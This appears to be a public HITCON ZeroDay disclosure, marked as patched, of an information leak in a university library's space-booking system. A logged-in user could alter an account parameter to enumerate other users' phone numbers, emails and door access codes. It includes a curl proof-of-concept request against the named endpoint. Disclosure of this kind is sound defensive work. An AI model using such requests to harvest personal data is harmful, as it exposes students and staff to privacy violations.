Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00465
- Vendor: 國立高雄師範大學
- Title: 國立高雄師範大學 圖書館空間借用系統 資訊洩漏
- Introduction: 已登入之用戶可用學號或員工編號列舉個資
處理狀態
目前狀態
公開
Last Update : 2025/06/28
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/05/23 23:44:24 : 新提交 (由 anonymous 更新此狀態)
- 2025/05/23 23:47:10 : 新提交 (由 anonymous 更新此狀態)
- 2025/05/23 23:48:56 : 新提交 (由 anonymous 更新此狀態)
- 2025/05/23 23:50:17 : 新提交 (由 anonymous 更新此狀態)
- 2025/05/27 22:47:33 : 新提交 (由 anonymous 更新此狀態)
- 2025/05/27 22:50:56 : 新提交 (由 anonymous 更新此狀態)
- 2025/05/30 09:14:41 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 14:39:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 14:39:50 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 14:39:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/20 15:08:49 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/28 03:00:15 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00465
- 通報者:xcultivation (anonymous)
- 風險:中
- 類型:資訊洩漏 (Information Leakage)
參考資料
攻擊者可利用洩漏資訊進行下一步攻擊行為。
OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure
CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure
CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://lend.nknu.edu.tw/semac/service/getUserInfo.html
https://lend.nknu.edu.tw/semac/service/index
https://lend.nknu.edu.tw/semac/service/index
敘述
已登入之使用者於空間借用系統於新增員編/學生證欄位點查詢後抓包XMLHttpRequest,可以看到response有手機號碼、信箱、門禁通行碼等個資。
抓包並把user_account參數改成員編或學號可列舉個資。
Poc
curl 'https://lend.nknu.edu.tw/semac/service/getUserInfo.html' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-b 'PHPSESSID=YOUR_PHPSESSID' \
-H 'Origin: https://lend.nknu.edu.tw' \
-H 'X-Requested-With: XMLHttpRequest' \
--data-raw 'user_account=YOUR_ACCOUNT_NAME'擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。